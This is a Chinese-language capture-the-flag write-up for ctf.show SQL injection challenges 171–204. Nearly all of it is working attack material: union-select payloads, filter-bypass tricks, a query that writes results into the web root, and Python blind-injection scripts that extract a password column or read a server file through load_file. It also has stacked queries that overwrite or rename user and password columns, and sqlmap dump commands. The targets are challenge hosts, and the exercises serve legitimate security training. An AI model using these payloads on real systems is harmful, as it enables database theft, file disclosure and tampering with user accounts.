171
order by 判断下
再union select联合查询下,数据库,表,列,字段
flag在password字段里
-1' union select 1,2,password from ctfshow_user --+
172
与171一样,多加了个表少了个列而已
-1' union select username,password from ctfshow_user2 --+
173
同上
1' union select id,username,password from ctfshow_user3--+
1' union select id,hex(username),hex(password,40) from ctfshow_user3 -- -
1' union select id,hex(username),right(password,40) from ctfshow_user3 -- -
感觉这两道题出题人屏蔽回显:flag的本意是要对回显进行下编码,可是回显的flag里并不包含flag,所以编码不编码都可以。要是编码可以hex()转下16进制,或者to_base64()等等。
174
可以用replace函数将禁止输出的转换为别的字符,输出后再转回去
0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23
175
如果返回结果中没有ASCII码在 00-7f范围的,才会查询成功。
几乎屏蔽了所有的字符,如果root权限的话可以把得到的结果写到一个文件。
0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+
176
过滤了select,大写绕过
-1' union sElect id,username,password from ctfshow_user where username='flag'--+
177
1'and'1'='1
用这个payload,可以检测出过滤了空格
通过注释绕过空格
通过括号绕过空格
反引号对表名字列名字的特殊性
Tab键%09
两个空格代替一个空格,用Tab代替空格,%a0=空格:
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
-1'/**/union/**/select/**/id,username,`password`from`ctfshow_user`where`username`='flag'%23
-1'%0bunion%0aselect%09id,username,`password`from`ctfshow_user`where`username`='flag'%23
178
/**/被过滤
-1'%09union%09select%09id,username,password%09from%09ctfshow_user%23
179
-1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%23
180
burp跑id跑出来的
1111111'or(id=26)and'b'='b
1111111'是为了闭合那个!=flag,要是没有这句直接输入26就好
181
1111'or(id=26)and'a'='a
182
1111'or(id=26)and'a'='a
183
mysql> select 'xxxyyy' regexp '^xx';
+-----------------------+
| 'xxxyyy' regexp '^xx' |
+-----------------------+
| 1 |
+-----------------------+
1 row in set (0.00 sec)
查询xxxyyy字符串中是否以xx开头,结果值为1,表示值为true,满足条件。
#-*- coding:utf-8 -*-
# Python 2 syntax (print statement). In Python 3 these become print(...) and
# string.letters/lowercase/uppercase are replaced by
# string.ascii_letters/ascii_lowercase/ascii_uppercase.
import string #the string module's ready-made character classes
print string.digits #the string of the digits 0-9
print string.letters #all letters, upper and lower case (Python 2 only)
print string.lowercase #all lower-case letters (Python 2 only)
print string.uppercase #all upper-case letters (Python 2 only)
print string.punctuation #all punctuation characters
print string.ascii_letters #same content as string.letters
顺便记下吧,要不总忘
regexp函数与like函数用来支持正则表达式
count()是统计,这个sql语句是对table_name表中的所有行记录做个统计,就是查出表中有多少行数据。
用的right,也可以用substr有点不太准确
import requests
import string

# Candidate alphabet for the character being guessed: digits, ASCII letters
# and punctuation.
# NOTE(review): string.punctuation contains '%' and '_', which are LIKE
# wildcards, so those two candidates can match spuriously.
str1=string.digits+string.ascii_letters+string.punctuation
# Challenge endpoint; the injected text is sent in the `tableName` POST field.
url="http://151bb639-2c31-4b57-9012-5efa4339852f.chall.ctf.show:8080/select-waf.php"
# The value is recovered from its right end one character at a time, so the
# accumulator starts with the closing brace and grows leftwards.
flag="}"
for k in range(2,100):
    for i in str1:
        # k = number of trailing characters of `pass` compared with LIKE;
        # i+flag = the candidate suffix of exactly that length.
        payload="`ctfshow_user`where(right(pass,%d))like'%s'"%(k,i+flag)
        # print(payload)
        data={
            'tableName':payload
        }
        talk=requests.post(url=url,data=data)
        # The script treats "$user_count = 1;" in the response as the match
        # signal. Server-side this is one POST per candidate, differing only
        # in the injected suffix.
        if "$user_count = 1;" in talk.text:
            flag=i+flag
            print(flag)
            break
        # NOTE(review): if no candidate matches for some k the outer loop still
        # advances, so later suffixes are compared at the wrong length.
184
where被过滤掉了,找个可以替代的,并且这个没过滤空格。
用join进行联合查询,即可注入。详细了解join语法可看这篇文章:
https://www.cnblogs.com/reaptomorrow-flydream/p/8145610.html
妈的要被这题气死,因为没看见过滤了单双引号。。tmd改了一下午脚本(写完还忘保存了)
直接搬了两位师傅的,第一个应该是群主师傅的改良版
import requests
#str1="flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}"
# Challenge endpoint; the injected text is sent in the `tableName` POST field.
url = "http://f15ac2ca-94b7-4257-a52a-00e52ecee805.chall.ctf.show/select-waf.php"
# Accumulator, pre-seeded with the known prefix.
flag = 'flag{'
# i = 1-based position in `pass`. 0 is not a valid substr position and 1-5
# hold the prefix already in `flag`, so those are skipped.
for i in range(45):
    if i <= 5:
        continue
    # j = candidate byte value. It is compared via regexp(char(j)) so that no
    # quote characters appear in the payload (the write-up says quotes are
    # filtered).
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))"
        }
        r = requests.post(url,data=data)
        # The script treats "$user_count = 43;" in the response as the match
        # signal.
        if r.text.find("$user_count = 43;")>0:
            # '.' matches any character in a regexp, so char(46) is never a
            # real hit; only other matches are recorded.
            if chr(j) != ".":
                flag += chr(j)
                # printed lower-cased because regexp matching is not case
                # sensitive here, so the first hit may be the upper-case form
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break
import requests
# Challenge endpoint; the injected text is sent in the `tableName` POST field.
url = '''http://e5e91710-3aa2-4752-a2a0-68a6c18fee26.chall.ctf.show/select-waf.php'''
data = {"tableName":""}
# Accumulator, pre-seeded with the known prefix.
flag = 'flag{'
# x = number of leading characters of `pass` compared; the known prefix is
# 5 characters long, so the search starts at 6.
for x in range(6,50):
    # Candidate alphabet: lower-case letters, digits, braces and dash.
    for y in r'abcdefghijklmnopqrstuvwxyz0123456789{-}':
        #dictionary: flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz} #ordering handed down by the group owner, more efficient
        # Python 2 only: str.encode('hex') yields the hex digits; sending the
        # value as a 0x... literal avoids any quote characters.
        temp = "0x"+(flag+y).encode('hex')
        data["tableName"]='ctfshow_user x right join ctfshow_user y on left(y.pass,%d) like %s'%(x,temp)
        #print(data)
        s = requests.post(url,data = data)
        #print(s.text)
        # The script treats a response WITHOUT "$user_count = 22;" as a match.
        if '$user_count = 22;' not in s.text:
            flag = flag + y
            print(flag)
            break
185
过滤了数字,
import requests
# Challenge endpoint; the injected text is sent in the `tableName` POST field.
url = "http://79ef2075-ac91-4c03-adb9-c2319bc040ed.chall.ctf.show:8080/select-waf.php"
# Recovered characters are appended here one at a time.
flag = ''
def createNum(n):
    """Spell out the integer *n* as a sum of ``true`` literals.

    ``1`` gives ``'true'``, ``3`` gives ``'true+true+true'``. Any value
    below 2 (including 0 and negatives) also gives a single ``'true'``.
    """
    terms = ["true"] * max(n, 1)
    return "+".join(terms)
# i = 1-based position in `pass`; j = candidate byte value. Both are spelled
# as sums of `true` via createNum because this challenge filters digits.
# NOTE(review): createNum(0) is also 'true', so i=0 repeats position 1 and
# j=0 repeats char(1).
for i in range(50):
    for j in range(127):
        data = {
            "tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp(char({2})))".format(createNum(i),createNum(1),createNum(j))
        }
        r = requests.post(url, data=data)
        # The script treats "$user_count = 43;" in the response as the match
        # signal.
        if "$user_count = 43;" in r.text:
            # '.' matches any character in a regexp, so char(46) is never a
            # real hit; only other matches are recorded.
            if chr(j)!='.':
                flag += chr(j)
                print(flag)
                break
# flag="W{C71C97F9-5610-45B1-9E29-F3FF73ADD0F6}"
# print(flag.lower())
186
import requests
# Challenge endpoint; the injected text is sent in the `tableName` POST field.
url = "http://3a7abf5d-8f36-4cab-8058-02c972aa00a0.chall.ctf.show:8080/select-waf.php"
# Recovered characters are appended here one at a time.
flag = ''
def createNum(n):
    """Return *n* written as ``true`` added to itself ``n`` times.

    ``createNum(1) == 'true'``, ``createNum(3) == 'true+true+true'``; for
    ``n < 2`` the result is always the single literal ``'true'``.
    """
    count = n if n > 1 else 1
    return "+".join("true" for _ in range(count))
# Same loop as challenge 185: i = 1-based position in `pass`, j = candidate
# byte value, both spelled as sums of `true` via createNum.
# NOTE(review): createNum(0) is also 'true', so i=0 repeats position 1 and
# j=0 repeats char(1).
for i in range(50):
    for j in range(127):
        data = {
            "tableName": "ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{0},{1})regexp(char({2})))".format(createNum(i),createNum(1),createNum(j))
        }
        r = requests.post(url, data=data)
        # The script treats "$user_count = 43;" in the response as the match
        # signal.
        if "$user_count = 43;" in r.text:
            # '.' matches any character in a regexp, so char(46) is never a
            # real hit; only other matches are recorded.
            if chr(j)!='.':
                flag += chr(j)
                print(flag)
                break
# flag="1111IHW{D72377E0-FF80-44C2-9D32-F172DC25E04F}"
# print(flag.lower())
187
md5(string,true)函数在指定了true的时候,返回的是原始 16 字符二进制格式。也就是说会返回这样子的字符串:'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
提供两个字符串: ffifdyop、129581926211651571912466741651878684928
content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b
188
SELECT * FROM TEST WHERE username = 0
查到全部结果:
USER_ID | USERNAME |
---|---|
1 | Jason |
2 | OOO |
3 | Stack |
4 | Overflow |
username=0 |
pass为0是因为密码比较为弱类型,字符串被转为0
username:0||1
password:0
189
import requests
# Challenge endpoint; the injected expression is sent in the `username` field.
url="http://9d4a4fc2-c2f3-4f35-8775-3e6d594cac14.chall.ctf.show:8080/api/index.php"
# Recovered bytes are appended here one at a time.
flag=""
# i = 1-based byte offset into the file returned by load_file().
# NOTE(review): there is no end-of-file stop; all 9999 offsets are probed.
for i in range(1,10000):
    # Binary search over the printable range 32..126 for the byte at offset i
    # (at most seven requests per byte).
    head=32
    tail=127
    mid=(head+tail)>>1
    while head<tail:
        # Boolean probe: 1 when the byte at offset i is greater than mid.
        payload="if(ascii(substr(load_file('/var/www/html/api/index.php'),{0},1))>{1},1,0)".format(str(i),str(mid))
        data={
            'username':payload,
            'password':'1'
        }
        talk=requests.post(url=url,data=data)
        # A JSON `msg` containing "查询失败" (query failed) is read as
        # "byte > mid" and raises the lower bound; anything else lowers the
        # upper bound.
        if "查询失败" in talk.json()['msg']:
            head=mid+1
        else:
            tail=mid
        mid=(head+tail)>>1
    # head == tail here: the resolved byte value.
    flag=flag+chr(head)
    print(data)
    print(flag)
190
import requests
# Challenge endpoint; the injected text is sent in the `username` field.
url="http://76887eea-2b05-4568-8286-11e205eae400.chall.ctf.show:8080//api/"
# Recovered characters are appended here one at a time.
flag=""
# i = 1-based character position in the selected value.
# NOTE(review): no stop condition; all 999 positions are probed.
for i in range(1,1000):
    # Binary search over the printable range 32..126 for the character at i.
    head=32
    tail=127
    mid=(head+tail)>>1
    while head<tail:
        # payload1 and payload2 are the earlier enumeration steps (table and
        # column names) kept for reference; only payload3 is interpolated.
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload3="select`f1ag`from(ctfshow_fl0g)"
        payload="admin' and if(ascii(substr(({0}),{1},1))>{2},1,0) -- ".format(payload3,i,mid)
        data={
            'username':payload,
            'password':'1'
        }
        talk=requests.post(url=url,data=data)
        # A `msg` exactly equal to "密码错误" (wrong password) is read as
        # "character > mid" and raises the lower bound; anything else lowers
        # the upper bound.
        if "密码错误" == talk.json()['msg']:
            head=mid+1
        else:
            tail=mid
        mid=(head+tail)>>1
    # head == tail == mid here: the resolved character.
    flag=flag+chr(mid)
    print(flag)
191
import requests
# Challenge endpoint; the injected text is sent in the `username` field.
url="http://d7d6dff2-db88-497e-ba34-62ef5cb2280c.chall.ctf.show:8080/api/"
# Recovered characters are appended here one at a time.
flag=""
# i = 1-based character position; j = candidate character from a fixed
# alphabet. There is no break after a hit, so every candidate is sent for
# every position (one POST per candidate).
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz}':
        # payload1 and payload2 are the earlier enumeration steps (table and
        # column names) kept for reference; only payload3 is interpolated.
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload3="select`f1ag`from(ctfshow_fl0g)"
        # Equality probe, closed with and '1'='1 instead of a comment.
        payload="admin' and if(substr(({0}),{1},1)='{2}',1,0) and '1'='1".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }
        talk=requests.post(url=url,data=data)
        # A `msg` exactly equal to "密码错误" (wrong password) is read as
        # "candidate matched".
        if "密码错误" == talk.json()['msg']:
            flag+=j
            print(flag)
#ord() could be used as well
192
同191
import requests
# Challenge endpoint; the injected text is sent in the `username` field.
url="http://f6db9285-fe7d-4699-87e3-c2c239528412.chall.ctf.show:8080/api/"
# Recovered characters are appended here one at a time.
flag=""
# i = 1-based character position; j = candidate character from a fixed
# alphabet (same as 191, with '_' added). No break after a hit, so every
# candidate is sent for every position.
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':
        # payload1 and payload2 are the earlier enumeration steps (table and
        # column names) kept for reference; only payload3 is interpolated.
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload3="select`f1ag`from(ctfshow_fl0g)"
        payload="admin' and if(substr(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }
        talk=requests.post(url=url,data=data)
        # A `msg` containing "密码错误" (wrong password) is read as
        # "candidate matched".
        if "密码错误" in talk.json()['msg']:
            flag+=j
            print(flag)
193
import requests
# Challenge endpoint; the injected text is sent in the `username` field.
url="http://e2394be5-bf88-4b7c-b742-3fc88ff2a46b.chall.ctf.show:8080/api/"
# Recovered characters are appended here one at a time.
flag=""
# i = 1-based character position; j = candidate character from a fixed
# alphabet. No break after a hit, so every candidate is sent for every
# position.
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':
        # payload1 and payload2 are the earlier enumeration steps (table and
        # column names) kept for reference; only payload3 is interpolated.
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
        payload3="select`f1ag`from(ctfshow_flxg)"
        # mid() instead of substr() this time (see the note at the end).
        payload="admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }
        talk=requests.post(url=url,data=data)
        # A `msg` containing "密码错误" (wrong password) is read as
        # "candidate matched".
        if "密码错误" in talk.json()['msg']:
            flag+=j
            print(flag)
#mid, left and right can all be used here
194
import requests
# Challenge endpoint; the injected text is sent in the `username` field.
# Same script as challenge 193, only the endpoint differs.
url="http://9f97023d-32c0-4761-8325-0fdb950b076e.chall.ctf.show:8080/api/"
# Recovered characters are appended here one at a time.
flag=""
# i = 1-based character position; j = candidate character from a fixed
# alphabet. No break after a hit, so every candidate is sent for every
# position.
for i in range(1,1000):
    for j in 'flag{b7c4de-2hi1jk_0mn5o3p6q8rstuvw9xyz}':
        # payload1 and payload2 are the earlier enumeration steps (table and
        # column names) kept for reference; only payload3 is interpolated.
        payload1="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        payload2="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
        payload3="select`f1ag`from(ctfshow_flxg)"
        payload="admin' and if(mid(({0}),{1},1)='{2}',1,0) -- ".format(payload3,i,j)
        data={
            'username':payload,
            'password':'1'
        }
        talk=requests.post(url=url,data=data)
        # A `msg` containing "密码错误" (wrong password) is read as
        # "candidate matched".
        if "密码错误" in talk.json()['msg']:
            flag+=j
            print(flag)
195
6;update(ctfshow_user)set`username`=6;
6;update(ctfshow_user)set`pass`=123;
username:6
password:123
196
username:6;select(6);
password:6
197-198
username:1;show tables;
password:ctfshow_user
或者用
0;alter table ctfshow_user change column `pass` `ppp`
varchar(255);
alter table ctfshow_user change column `id` `pass` varchar(255);
alter table ctfshow_user change column `ppp` `id` varchar(255);
这种师傅的方法把id和密码调换一下,这样返回值就是id,因为存在admin用户,所以再爆破下password就好,admin需要16进制,因为username没有单引号,不会被当作字符串,转换会出错。
199-200
username:1;show tables;
password:ctfshow_user
201
# 201: target given with -u (GET parameter id); --referer sends a Referer header;
# -D/-T/-C name the database, table and column; --dump retrieves that column.
py sqlmap.py -u http://ef10ecde-5d52-4969-8cce-f6667883b929.chall.ctf.show:8080/api/?id=1 --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump
202
# 202: same as 201, but id is sent as a POST body via --data.
py sqlmap.py http://58b01807-5ef0-4a36-8890-5248a7bd48a9.chall.ctf.show:8080/api/ --data="id=1" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump
203
# 203: same as 202, but --method=PUT and --headers set Content-Type: text/plain.
py sqlmap.py http://5ce3d12a-eac4-48ad-8dbe-587ebabe5de2.chall.ctf.show:8080/api/index.php --method=PUT --data="id=1" --headers="Content-Type: text/plain" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump
204